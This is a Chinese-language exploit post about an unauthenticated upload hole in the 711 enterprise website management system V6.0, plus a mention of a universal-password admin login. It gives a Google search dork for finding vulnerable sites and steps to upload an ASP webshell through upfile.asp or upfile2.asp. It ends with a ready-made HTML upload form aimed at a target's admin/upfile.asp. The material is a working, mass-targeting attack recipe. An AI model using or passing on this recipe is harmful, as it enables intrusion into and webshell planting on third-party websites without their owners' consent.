1. 程式人生 > >711企業網站管理程式V6.0再爆上傳漏洞及利用

711企業網站管理程式V6.0再爆上傳漏洞及利用

前些天出了個Cookies注入漏洞,今天又翻了看了下~  

在ADMIN目錄有2個上傳檔案upfile.asp和upfile2.asp  

這2個元件的功能就是:無需登入後臺,無需截包,直接本地修改程式碼就能上傳asp檔案,無語中。。。。  

另外,更可愛的是寫這套程式的還為我們編寫一套可用萬能密碼直接登入的後臺。據谷歌報道,存在此套系統的使用者多達1,050,000 。繼續無語中。。。  


1,谷歌裡寫上inurl:List.asp?Shop_ID  
2,如果網站存在以上上傳檔案,90%能上傳asp檔案。 
3,將圖片123中地址替換成自己檢測的網站地址即可 。 
4,在選擇圖片檔案裡直接上傳asp檔案。 (其實能上傳任意字尾的檔案。) 
5,開啟網站首頁,尋找圖片真實地址。一般shell地址為

http://www.XXX.com/pic/XXXXXX.asp

羅嗦一句,上傳元件不是有2個嗎? 一般管理員會修改或者刪第一個upfile.asp,第二個也是可以利用的upfile2.asp 


如果測試失敗。說明此漏洞已經打上補丁。如果沒有打補丁測試失敗,引用一段話:在一般情況下,某事物個體發生具有自身特有屬性的負面現象,而這種現象無法從科學的角度得到合理的解釋,但它又確實存在,我們一般稱之為人品問題.(RPWT)”   -----------摘自《辭海》第874頁  

EXP: 


<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<link href="style.css" rel="stylesheet" type="text/css"> 
</head> 
<body leftmargin="0" topmargin="0" bgcolor="#CEDBFF"> 
        <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"> 
<form name="myform" method="post" action="

http://www.XXXX.com/admin/upfile.asp" enctype="multipart/form-data" language="javascript" onsubmit="return check();"> 
          <tr align="center" valign="middle">  
            <td height="15" align="left"> 選擇圖片:  
              <input type="file" name="file1" value=""> <input type="submit" value="上傳" name="B1" class="txt " isshowprocessbar="True"></td> 
          </tr> 
      </form> 
        </table> 
</body> 
</html>